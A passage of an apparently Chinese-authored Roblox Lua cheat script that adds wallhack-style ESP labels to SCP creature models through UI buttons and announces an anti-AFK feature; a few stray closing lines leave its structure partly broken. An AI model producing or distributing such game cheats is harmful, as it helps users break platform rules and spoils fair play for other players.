    local billboard = existingBillboard or Instance.new("BillboardGui")
    local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

    billboard.Name = billboardName
    billboard.Adornee = head
    billboard.Size = UDim2.new(0, 100, 0, 50)
    billboard.StudsOffset = Vector3.new(0, 3, 0)
    billboard.AlwaysOnTop = true

    textLabel.Name = "TextLabel"
    textLabel.Size = UDim2.new(1, 0, 1, 0)
    textLabel.BackgroundTransparency = 1
    textLabel.TextStrokeTransparency = 0
    textLabel.TextSize = _G.ESPTextSize or 14
    textLabel.Font = Enum.Font.SourceSansBold
    textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
    textLabel.TextColor3 = color or Color3.new(1, 0, 0)
    textLabel.Parent = billboard

    if not existingBillboard then
        billboard.Parent = head
    end

    if model:IsA("Model") then
        for _, part in pairs(model:GetDescendants()) do
            if part:IsA("BasePart") then
                part.LocalTransparencyModifier = 0
            end
        end
    elseif model:IsA("BasePart") then
        model.LocalTransparencyModifier = 0
    end
end

--[[
    使用示例：
    ESP(输入模型名称, "输入名称", Color3.new(0, 1, 0))
]]
ESP(workspace.SCPs["SCP-131"].Yellow.HumanoidRootPart, "SCP（131）", Color3.new(0, 1, 0))
end)

ESP(workspace.SCPs["SCP-079"].Monitor.Monitor, "SCP（079）", Color3.new(0, 1, 0))
end)
teleportss:Button("透视049",function()
    local function ESP(model, Name, color)
        if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
            return 
        end
        
        local head
        if model:IsA("BasePart") then
            head = model
        else
            head = model:FindFirstChild("Head") 
                or model:FindFirstChild("HumanoidRootPart") 
                or model:FindFirstChildWhichIsA("BasePart")
        end
        
        if not head then return end
        
        local billboardName = "ModelESP"
        local existingBillboard = head:FindFirstChild(billboardName)
        local billboard = existingBillboard or Instance.new("BillboardGui")
        local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

        billboard.Name = billboardName
        billboard.Adornee = head
        billboard.Size = UDim2.new(0, 100, 0, 50)
        billboard.StudsOffset = Vector3.new(0, 3, 0)
        billboard.AlwaysOnTop = true

        textLabel.Name = "TextLabel"
        textLabel.Size = UDim2.new(1, 0, 1, 0)
        textLabel.BackgroundTransparency = 1
        textLabel.TextStrokeTransparency = 0
        textLabel.TextSize = 14
        textLabel.Font = Enum.Font.SourceSansBold
        textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
        textLabel.TextColor3 = color or Color3.new(1, 0, 0)
        textLabel.Parent = billboard

        if not existingBillboard then
            billboard.Parent = head
        end

        if model:IsA("Model") then
            for _, part in pairs(model:GetDescendants()) do
                if part:IsA("BasePart") then
                    part.LocalTransparencyModifier = 0
                end
            end
        elseif model:IsA("BasePart") then
            model.LocalTransparencyModifier = 0
        end
    end

    -- 使用示例：
    ESP(workspace.SCPs["SCP-049"].UpperTorso, "SCP（049）", Color3.new(0, 1, 0))
end)
teleportss:Button("透视966",function()
    local function ESP(model, Name, color)
        if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
            return 
        end
        
        local head
        if model:IsA("BasePart") then
            head = model
        else
            head = model:FindFirstChild("Head") 
                or model:FindFirstChild("HumanoidRootPart") 
                or model:FindFirstChildWhichIsA("BasePart")
        end
        
        if not head then return end
        
        local billboardName = "ModelESP"
        local existingBillboard = head:FindFirstChild(billboardName)
        local billboard = existingBillboard or Instance.new("BillboardGui")
        local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

        billboard.Name = billboardName
        billboard.Adornee = head
        billboard.Size = UDim2.new(0, 100, 0, 50)
        billboard.StudsOffset = Vector3.new(0, 3, 0)
        billboard.AlwaysOnTop = true

        textLabel.Name = "TextLabel"
        textLabel.Size = UDim2.new(1, 0, 1, 0)
        textLabel.BackgroundTransparency = 1
        textLabel.TextStrokeTransparency = 0
        textLabel.TextSize = 14
        textLabel.Font = Enum.Font.SourceSansBold
        textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
        textLabel.TextColor3 = color or Color3.new(1, 0, 0)
        textLabel.Parent = billboard

        if not existingBillboard then
            billboard.Parent = head
        end

        if model:IsA("Model") then
            for _, part in pairs(model:GetDescendants()) do
                if part:IsA("BasePart") then
                    part.LocalTransparencyModifier = 0
                end
            end
        elseif model:IsA("BasePart") then
            model.LocalTransparencyModifier = 0
        end
    end

    ESP(workspace.SCPs["SCP-966"].UpperTorso, "SCP（966）", Color3.new(0, 1, 0))
end)
teleportss:Button("透视023",function()
    local function ESP(model, Name, color)
        if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
            return 
        end
        
        local head
        if model:IsA("BasePart") then
            head = model
        else
            head = model:FindFirstChild("Head") 
                or model:FindFirstChild("HumanoidRootPart") 
                or model:FindFirstChildWhichIsA("BasePart")
        end
        
        if not head then return end
        
        local billboardName = "ModelESP"
        local existingBillboard = head:FindFirstChild(billboardName)
        local billboard = existingBillboard or Instance.new("BillboardGui")
        local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

        billboard.Name = billboardName
        billboard.Adornee = head
        billboard.Size = UDim2.new(0, 100, 0, 50)
        billboard.StudsOffset = Vector3.new(0, 3, 0)
        billboard.AlwaysOnTop = true

        textLabel.Name = "TextLabel"
        textLabel.Size = UDim2.new(1, 0, 1, 0)
        textLabel.BackgroundTransparency = 1
        textLabel.TextStrokeTransparency = 0
        textLabel.TextSize = 14
        textLabel.Font = Enum.Font.SourceSansBold
        textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
        textLabel.TextColor3 = color or Color3.new(1, 0, 0)
        textLabel.Parent = billboard

        if not existingBillboard then
            billboard.Parent = head
        end

        if model:IsA("Model") then
            for _, part in pairs(model:GetDescendants()) do
                if part:IsA("BasePart") then
                    part.LocalTransparencyModifier = 0
                end
            end
        elseif model:IsA("BasePart") then
            model.LocalTransparencyModifier = 0
        end
    end

    ESP(workspace.SCPs["SCP-023"].UpperTorso, "SCP（023）", Color3.new(0, 1, 0))
end)
teleportss:Button("透视457",function()
    local function ESP(model, Name, color)
        if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
            return 
        end
        
        local head
        if model:IsA("BasePart") then
            head = model
        else
            head = model:FindFirstChild("Head") 
                or model:FindFirstChild("HumanoidRootPart") 
                or model:FindFirstChildWhichIsA("BasePart")
        end
        
        if not head then return end
        
        local billboardName = "ModelESP"
        local existingBillboard = head:FindFirstChild(billboardName)
        local billboard = existingBillboard or Instance.new("BillboardGui")
        local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

        billboard.Name = billboardName
        billboard.Adornee = head
        billboard.Size = UDim2.new(0, 100, 0, 50)
        billboard.StudsOffset = Vector3.new(0, 3, 0)
        billboard.AlwaysOnTop = true

        textLabel.Name = "TextLabel"
        textLabel.Size = UDim2.new(1, 0, 1, 0)
        textLabel.BackgroundTransparency = 1
        textLabel.TextStrokeTransparency = 0
        textLabel.TextSize = 14
        textLabel.Font = Enum.Font.SourceSansBold
        textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
        textLabel.TextColor3 = color or Color3.new(1, 0, 0)
        textLabel.Parent = billboard

        if not existingBillboard then
            billboard.Parent = head
        end

        if model:IsA("Model") then
            for _, part in pairs(model:GetDescendants()) do
                if part:IsA("BasePart") then
                    part.LocalTransparencyModifier = 0
                end
            end
        elseif model:IsA("BasePart") then
            model.LocalTransparencyModifier = 0
        end
    end

    ESP(workspace.SCPs["SCP-457"].HumanoidRootPart, "SCP（457）", Color3.new(0, 1, 0))
end)

notifications:notify{
    Title = "空云脚本",
    Description = "已启用反挂机",
    Icon = 6031302918,
    Accept = {
        Text = "好的",
        Callback = function()
            print("!!!")
        end
    },
    Length = 30
}

